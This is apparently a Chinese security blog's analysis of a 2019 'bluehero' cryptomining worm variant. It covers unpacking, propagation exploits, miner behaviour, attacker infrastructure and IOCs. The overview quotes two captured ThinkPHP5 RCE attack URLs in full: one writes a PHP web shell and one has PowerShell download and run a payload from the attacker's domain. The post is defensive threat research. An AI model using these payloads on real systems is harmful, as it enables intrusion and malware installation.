首页 » NetworkSec » VirusAnalysis » 正文

bluehero挖矿蠕虫新变种v20190604简单分析

0x00 概述

捕获到利用thinkphp5 rce漏洞的攻击记录,经分析为bluehero新变种,编译时间为20190604。

attack:http://1.2.3.4:80/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET[‘xcmd’];system($action);?^>>hydra.php;

attack:http://1.2.3.4:80/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile(‘http://fid.hognoob.se/download.exe’,’SystemRoot/Temp/wtrgaltqtqzkxtb28962.exe’);start SystemRoot/Temp/wtrgaltqtqzkxtb28962.exe;

 

0x01 逆向分析

download.exe:

SHA256:6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b

upx脱壳

upx.exe -d “” -o “”

编译时间戳

2019-06-04 04:26:51

PEID

  • PE: packer: UPX(3.94)[NRV,brute]
  • PE: compiler: Microsoft Visual C/C++(6.0)[-]
  • PE: linker: Microsoft Linker(6.0)[EXE32]

入口所在段

UPX1

镜像基地址

0x400000

入口点(OEP)

0x4dcc0

 

下载母体文件

存储到%SystemRoot%\Temp\SunloglicySrv.exe。

SunloglicySrv.exe

upx脱壳

下载配置

http://uio.hognoob.se:63145/cfg.ini

生成ip段

获取本地IP地址,访问http://2019.ip138.com/ic.asp 获取所在公网ip,将生成的ip段包括所在公网的B段,以及随机生成的公网地址保存为ip.txt,启动端口扫描工具对ip的139/445端口进行扫描,将扫描结果保存到result.txt。

用masscan扫描内网和外网的端口

永恒之蓝攻击(32/64)

  

cve-2019-2725攻击

 

ipc$爆破

利用内置密码字典进行ipc$远程爆破,爆破登录成功后在目标机器利用psexec工具或者wmic执行远程命令植入木马程序。

cve-2017-5638攻击

cve-2017-10271攻击

好像和2725用的是相同的payload。

thinkphp5 rce攻击

tomcat put 攻击

0x02 流量分析

download.exe

SunloglicySrv.exe下载cfg.ini

爆破mssql-1433

0x03 行为分析

SystemRoot/Temp/wtrgaltqtqzkxtb28962.exe(即download.exe)

运行后自删除,并释放后门文件ucokcu.exe(随机六字母文件名)

该程序没有图标,没文件名,具有隐蔽性,后门程序作为系统服务启动。

 

download.exe下载病毒母体SunloglicySrv.exe

写入到C:\webkitssdk\2.7.92\目录下(不确定是SunloglicySrv.exe还是ucokcu.exe,按微步的沙箱看应该是ucokcu.exe)

木马后门黑客服务器ip。

SunloglicySrv.exe

下载挖矿配置cfg.ini

释放一堆文件:

zunnrhu.exe和SunloglicySrv.exe基本一样,含有多种攻击模块。

ipc$爆破,利用mimikatz读取密码。

疑似端口扫描程序。

永恒之蓝。

cve-2017-8464。

生成ip段

利用procdump和psexec。

矿机程序,xmrig挖门罗币。

upx脱壳

矿池

添加计划任务。

添加服务。

攻击7001,weblogic漏洞。

连接黑客服务器80.82.70.188:35791(远控)

相关进程。

0x04 关联分析

fid.hognoob.se

注册时间2019-03-01 00:00:00

过期时间2020/3/1 0:00:00

45.67.14.164(英国 英格兰 伦敦)

21/tcp   open   ftp            Pure-FTPd

80/tcp   open   http           nginx

9898/tcp open   http           Ajenti http control panel

fid.hognoob.se服务器iP:

当前解析:

英国45.67.14.164

历史解析记录:

2019-05-15—–2019-06-1445.67.14.164

2019-05-08—–2019-05-08195.128.124.189

2019-04-27—–2019-04-28195.128.124.159

2019-04-15—–2019-04-18195.128.127.237

2019-04-01—–2019-04-1145.67.14.168

2019-03-17—–2019-03-19195.128.127.254

2019-03-13—–2019-03-1345.79.66.44

bt宝塔面板

45.67.14.164

英国 英格兰 伦敦

运营商:pitcommunications.net

195.128.124.140

XMRCoinMiner挖矿木马

运营商:inoventica.ru

俄罗斯莫斯科

 

80.82.70.234

荷兰 阿姆斯特丹Ecatel公司

 

185.164.72.143

iis7.5

猜测攻击者应该是欧洲的。

 

0x05 IOC

http://fid.hognoob.se/download.exe(45.67.14.164)//19日更改解析ip(80.82.70.234)//22日更改解析为127.0.0.1/185.164.72.143(荷兰北阿姆斯特丹/伊朗)

SHA-256: 6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b

http://fid.hognoob.se/SunloglicySrv.exe

SHA-256: e5f1244002929418a08d4623b7de39ccf591acb868d0e448ed4f7174d03c2c81

http://uio.hognoob.se:63145/cfg.ini(45.67.14.166)

195.128.124.140

 

0x06 结语

总体来说,v20190604版本和之前的bluehero版本差别不大,也可能是分析不完全,如有错漏,欢迎指点!

 

0x07 参考资料

v201808

https://www.freebuf.com/column/180544.html

v201903

https://s.tencent.com/research/report/675.html

v201905

https://s.tencent.com/research/report/724.html

Comment